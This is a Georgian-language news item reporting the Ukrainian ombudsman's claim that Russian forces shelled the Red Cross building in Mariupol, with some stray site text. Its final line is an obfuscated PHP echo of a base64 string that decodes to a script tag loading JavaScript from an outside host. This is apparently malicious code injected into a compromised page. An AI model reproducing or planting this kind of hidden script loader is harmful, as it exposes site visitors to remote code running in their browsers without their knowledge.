celsiusi
ავერსი საქკაბელი
უკრაინის ომბუდსმენის, ლუდმილა დენისოვას განცხადებით, რუსულმა ძალებმა, ალყაში მოქცეულ მარიუპოლში, „წითელი ჯვრის“ შენობას ცეცხლი გაუხსნეს. ამის შესახებ ინფორმაციას „გარდიანი“ ავრცელებს.
 
დენისოვა მსოფლიო თანამეგობრობას მოუწოდებს, მიიღოს ზომები „წითელი ჯვრის“ შენობის დაბომბვისა და უკრაინის ტერიტორიაზე მიმდინარე ომის დასრულების შესახებ.
 
„მარიუპოლში, ოკუპანტებმა „წითელი ჯვრის“ საერთაშორისო კომიტეტის შენობა მიზანში ამოიღეს. მტრის თვითმფრინავებმა და არტილერიამ ცეცხლი გაუხსნეს შენობას, რომელზეც თეთრ ფონზე, წითელი ჯვარი იყო გამოსახული, რაც დაჭრილებისა და ჰუმანიტარული ტვირთის არსებობის შესახებ მიუთითებს. ეს რუსეთის არმიის მორიგი ომის დანაშაული და 1949 წლის ჟენევის კონვენციის უხეში დარღვევაა. აქამდე, ერთადერთი, ვინც წითელი ჯვრით აღნიშნული შენობები და ავტომობილები დაბომბა, იყო ჰიტლერის ჯარები. მოვუწოდებ, მსოფლიო თანამეგობრობას, დაგმოს, ოკუპანტი ქვეყნის ბარბაროსული ქმედებები, „წითელი ჯვრის“ შენობის დაბომბვის გამო და მიიღოს ზომები, იმისთვის, რომ ეს სისხლიანი ომი უკრაინის ტერიტორიაზე, რაც შეიძლება მალე დასრულდეს“, - განაცხადა დენისოვამ.
714
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");